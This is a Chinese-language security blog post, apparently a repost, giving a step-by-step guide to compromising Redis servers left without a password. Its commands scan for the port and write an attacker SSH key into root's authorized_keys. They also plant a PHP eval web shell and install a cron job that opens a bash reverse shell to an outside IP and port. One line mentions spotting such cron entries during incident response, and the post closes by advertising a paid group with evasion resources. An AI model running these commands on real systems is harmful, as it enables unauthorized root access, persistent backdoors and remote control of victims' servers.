干货 | Redis的漏洞总结(建议收藏)

admin 2024年3月11日19:14:00评论6 views字数 2555阅读8分31秒阅读模式

声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 








01


漏洞探测

redis默认情况是空密码连接而且如果是root权限的话,会造成很大的危害。


Namp

nmap -sV -p6379 -Pn  ip

干货 | Redis的漏洞总结(建议收藏)Nuclei

nuclei.exe  -u  ip

干货 | Redis的漏洞总结(建议收藏)


02


未授权登录

当扫描发现主机端口对应的服务地址后,使用本地Redis客户端连接服务器获取敏感数据了。

redis-cli   -h  ip

干货 | Redis的漏洞总结(建议收藏)




03

写入SSH公钥

在攻击机中生成ssh公钥和私钥,密码设置为空

ssh-keygen -t rsa

干货 | Redis的漏洞总结(建议收藏)

cd /root/.ssh

干货 | Redis的漏洞总结(建议收藏)

id_rsa 是私钥文件,id_rsa.pub是公钥文件,现在需要将公钥文件上传到redis服务器上,通过私钥文件连接。

cat id_rsa.pub //查询公钥里面的内容ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9RP06xy1QBknlEBqIGwFZ7hecRtgyEIu1xYABNiJe1SalSJHrk4WMb3QVdZMNoGB5A3dnd/fgNzISRKDxG2W5XSnlCVaKZCVA9OBmPfrw4IUAkBjJZlcSafQSQJEm2VRRmkmMxutI5uTTHcAFke/WdEBi75QfJ+XZz8MdW8MJy7Z1JqF7GI9yUShQPOEYfF0UaMzho49m0PpieD9wI/2pilJSMzA98hQtyUMEhyWe5DQ2dzq/lnMwsYHdqA/Quh6Q3kH647iMJIXz5LZDrcVz0ERbOAm3M6FCSF6HNSfQPPZzRgVQEnSzdrL6xruvH8hAT+khk8B5NlicRTYJ7wQ64tSug9HmAbvq8DnmJ8+b0N0EEy7ooMXs8XEvkQzfRsIjKSYeT9650C/kggTKLEdpLSqp/Qtdj6gIlncfWveAgkU2rznaDWmKDdQrrM6xSfbx0Xi/UYEkjPOcKJ72BpNV3ZwHhUu5lValEglyt0P6FcDdE607hjYC+WevwZbofsc= root@kali

干货 | Redis的漏洞总结(建议收藏)

更改redis备份路径为/root/.ssh,并修改上传公钥文件的名称为 authorized_keys

./redis-cli -h  ip  config set dir /root/.ssh/config set dbfilename authorized_keysset x "nnnssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9RP06xy1QBknlEBqIGwFZ7hecRtgyEIu1xYABNiJe1SalSJHrk4WMb3QVdZMNoGB5A3dnd/fgNzISRKDxG2W5XSnlCVaKZCVA9OBmPfrw4IUAkBjJZlcSafQSQJEm2VRRmkmMxutI5uTTHcAFke/WdEBi75QfJ+XZz8MdW8MJy7Z1JqF7GI9yUShQPOEYfF0UaMzho49m0PpieD9wI/2pilJSMzA98hQtyUMEhyWe5DQ2dzq/lnMwsYHdqA/Quh6Q3kH647iMJIXz5LZDrcVz0ERbOAm3M6FCSF6HNSfQPPZzRgVQEnSzdrL6xruvH8hAT+khk8B5NlicRTYJ7wQ64tSug9HmAbvq8DnmJ8+b0N0EEy7ooMXs8XEvkQzfRsIjKSYeT9650C/kggTKLEdpLSqp/Qtdj6gIlncfWveAgkU2rznaDWmKDdQrrM6xSfbx0Xi/UYEkjPOcKJ72BpNV3ZwHhUu5lValEglyt0P6FcDdE607hjYC+WevwZbofsc= root@kalinnn"saveexit

干货 | Redis的漏洞总结(建议收藏)

ssh -i  id_rsa root@ip

干货 | Redis的漏洞总结(建议收藏)




04

写入一句话木马

如果该服务器上部署网站的话可以通过写入一句话木马的方式进行攻击

config set dir /var/www/html/   // 必须知道网站目录config set  dbfilename shell.php set x "<?php eval($_POST['cmd']);?>" 或者:set shell "rnrn<?php @eval($_POST['cmd']);?>rnrn"saveexit

干货 | Redis的漏洞总结(建议收藏)

用蚁剑连接

干货 | Redis的漏洞总结(建议收藏)

连接成功!  



05

反弹shell

nc -lvnp 4444redis-cli -h ip  #登陆到redis数据库set  xx   "n* * * * * bash -i >& /dev/tcp/192.168.112.128/4444 0>&1n"config set dir /var/spool/cron  #设置工作目录config set dbfilename root      #设置文件名,当前用户叫啥就得命名为啥,当前用户为rootsave                            #保存exit

干货 | Redis的漏洞总结(建议收藏)


写入计划任务

干货 | Redis的漏洞总结(建议收藏)

注意:当我们在做应急响应的时候发现 上图红框处存在redis写计划任务特征,要特别留意

干货 | Redis的漏洞总结(建议收藏)


反弹成功



06

fscan内网利用

写入SSH公钥

./fscan_amd64  -h ip  -np  -nopoc -no -rf  id_rsa.pub   -m redis

干货 | Redis的漏洞总结(建议收藏)

ssh  -i  id_rsa  root@ip

干货 | Redis的漏洞总结(建议收藏)





付费圈子


欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

干货 | Redis的漏洞总结(建议收藏)

进成员内部群


干货 | Redis的漏洞总结(建议收藏)



干货 | Redis的漏洞总结(建议收藏)

星球的最近主题和星球内部工具一些展示


干货 | Redis的漏洞总结(建议收藏)


干货 | Redis的漏洞总结(建议收藏)

干货 | Redis的漏洞总结(建议收藏)

干货 | Redis的漏洞总结(建议收藏)

干货 | Redis的漏洞总结(建议收藏)


干货 | Redis的漏洞总结(建议收藏)

干货 | Redis的漏洞总结(建议收藏)

干货 | Redis的漏洞总结(建议收藏)

干货 | Redis的漏洞总结(建议收藏)


干货 | Redis的漏洞总结(建议收藏)

加入安全交流群


干货 | Redis的漏洞总结(建议收藏)                                


干货 | Redis的漏洞总结(建议收藏)




干货|史上最全一句话木马


干货 | CS绕过vultr特征检测修改算法


实战 | 用中国人写的红队服务器搞一次内网穿透练习


实战 | 渗透某培训平台经历


实战 | 一次曲折的钓鱼溯源反制


免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦


原文始发于微信公众号(渗透安全团队):干货 | Redis的漏洞总结(建议收藏)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月11日19:14:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   干货 | Redis的漏洞总结(建议收藏)http://cn-sec.com/archives/2567704.html

发表评论

匿名网友 填写信息